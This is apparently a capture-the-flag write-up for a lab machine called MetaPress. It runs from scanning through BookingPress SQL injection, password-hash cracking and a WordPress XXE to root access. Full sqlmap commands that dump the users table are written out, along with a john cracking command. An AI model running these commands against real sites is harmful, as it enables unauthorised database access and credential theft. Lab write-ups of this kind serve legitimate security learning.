I scan with nmap tool.
I add the domain and his ip address into /etc/hosts.
I scan with gobuseter either dns and directory.
I find a vulnerable version of the BookingPress under the http://metapress.htb/events/
I make the same instruction that above image. I have to find nonce and find it so I run the exploit and I get the response.
It may be a sqlinjection and I try it.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs Yess there is a sql vulnerability.
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog --tables
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=ad14d8652b&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog -T wp_
users --dump sqlmap say that where is the result of scaning.
I crack manager of hash with john the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtI login in the website.
WordPress 5.6.2 has a XXE vulnerability.
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
I do the instructions that I show the link.
I upload the vaw file and I get the response.
I decode from base64.
I change the directory. I have look WordPress structure.
I modify my exploit like above the image.
I find ftp credentials. There is a intresting file that I have to look so I download the php file an find a credential.
I connect to ssh. There is a secret file unde the jnelson’s home directory file.
I try to crack PGP Private key and It success.
I execute the command and I am a root.
